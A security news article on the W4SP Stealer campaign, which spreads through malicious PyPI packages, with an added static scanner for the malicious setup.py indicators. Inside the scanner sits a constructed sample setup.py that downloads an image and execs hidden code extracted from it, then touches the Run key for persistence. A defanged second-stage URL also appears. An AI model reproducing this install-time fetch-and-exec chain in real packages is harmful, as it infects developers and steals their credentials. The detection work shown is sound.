W4SP Stealer Actively Targeting Python Developers in Ongoing Supply Chain Attack

Checkmarx researchers uncovered an ongoing supply chain attack that uses malicious Python packages to distribute malware tracked as WASP, with hundreds of victims infected to date.

“Our team was able to get inside the attacker’s ‘hall of fame’; we could see hundreds of successful infections,” Checkmarx researcher Jossef Harush said in a Medium write-up, calling the adversary WASP. “The attack seems related to cybercrime as the attacker claims that these tools are undetectable to increase sales.”

What’s WASP Stealer

WASP Stealer is Discord-oriented malware that steals accounts, passwords, crypto wallets, credit card numbers and other files of interest from the victim’s computer and sends them to the attacker’s Discord webhook.

The malware has persistence features that are enabled at startup of the infected PC. Its creators claim that WASP Stealer is entirely undetectable and is “protected by some awesome obfuscation.”

It sells for $20, with payment made in crypto or gift cards.

Checkmarx’s findings add to recent reports from Phylum and Check Point, which found 30 modules published on the Python Package Index (PyPI) that were designed to spread malicious code while looking like harmless packages.

What makes it notable is the use of steganography to hide a polymorphic malware payload within an image file hosted on Imgur.

WASP Stealer infection phase

Once a user installs the malicious package, its setup.py script executes and installs additional Python packages on the victim’s system, notably judyb, which provides steganography utilities.

Next, the setup.py script downloads a .png image from the Imgur address and saves it in the operating system’s temp directory. It then calls the judyb package’s “lsb.reveal” function to extract the hidden code from the PNG image.

Figure: visualization of the code hidden inside the image using steganography.

Once the code extracted in the previous stage is executed, it fetches another piece of code from the URL “hxxp://misogyny[.]wtf/inject/UsRjS959Rqm4sPG4” and saves it under a random file name in the temp directory.

It then modifies the registry key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run so that the Python code is launched again at every PC start-up.

The overall process ends with the W4SP Stealer (aka WASP Stealer) infection.
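The chain above leaves a recognisable footprint in a package’s setup.py: a steganography dependency pulled in at install time, an Imgur URL, an lsb.reveal call whose output is passed to exec, use of the temp directory, and a write to the Run key. The following static scanner, an added example that is not Checkmarx’s tooling or code from the campaign, walks the setup.py AST and reports which of those indicators are present; the embedded sample setup.py is constructed to mirror the described chain and is not a real package.

```python
import ast

# Indicators drawn from the infection chain described above
STEGO_MODULES = {"judyb"}
RUN_KEY = r"Microsoft\Windows\CurrentVersion\Run"

# Constructed sample setup.py (hypothetical, mirrors the described stages)
SAMPLE_SETUP_PY = r'''
import os, subprocess, tempfile, urllib.request, winreg
subprocess.check_call(["pip", "install", "judyb"])
from judyb import lsb
img = os.path.join(tempfile.gettempdir(), "x.png")
urllib.request.urlretrieve("https://i.imgur.com/EXAMPLE.png", img)
exec(lsb.reveal(img))
k = winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                   r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run")
'''

def scan_setup_py(source: str) -> set:
    """Return the set of indicator names found in a setup.py source."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            # Top-level module names of every import/from-import
            roots = {a.name.split(".")[0] for a in node.names}
            module = getattr(node, "module", None)
            if module:
                roots.add(module.split(".")[0])
            if roots & STEGO_MODULES:
                findings.add("stego-import")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            value = node.value
            if "judyb" in value:                      # e.g. pip install judyb
                findings.add("stego-install")
            if "imgur.com" in value.lower():
                findings.add("imgur-url")
            if RUN_KEY.lower() in value.lower():      # persistence via Run key
                findings.add("run-key")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id == "exec":
                findings.add("exec-call")
            if isinstance(func, ast.Attribute) and func.attr == "reveal":
                findings.add("lsb-reveal")             # judyb lsb.reveal()
            if isinstance(func, ast.Attribute) and func.attr == "gettempdir":
                findings.add("temp-dir")
    return findings

if __name__ == "__main__":
    print(sorted(scan_setup_py(SAMPLE_SETUP_PY)))
```

A clean setup.py that only calls setuptools yields an empty set; several of these indicators together, in particular lsb-reveal feeding exec-call, are a strong reason to quarantine the package before it is installed anywhere.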

Checkmarx’s analysis further tracked down the attacker’s Discord server, which is run by a single user named “Alpha.#0001,” as well as the fake GitHub profiles that were made to trick developers into downloading the malware.

On November 15th, the threat actor was detected using a new PyPI account (“halt”) to publish typosquatting libraries that relied on the StarJacking approach, in which a package is published with a URL that points to an already popular source code repository.

“The simple and lethal technique of fooling users by creating fake GitHub accounts and sharing poisoned snippets has proven to trick hundreds of users into this campaign.”

“The level of manipulation used by software supply chain attackers is increasing as attackers get increasingly more clever,” the report concludes.

The development also coincides with the publication of new guidelines by U.S. cybersecurity and intelligence agencies outlining the recommended practices customers can take to secure the software supply chain.

“Customer teams specify to and rely on vendors for providing key artifacts (e.g. SBOM) and mechanisms to verify the software product, its security properties, and attest to the SDLC security processes and procedures,” the guidance reads.
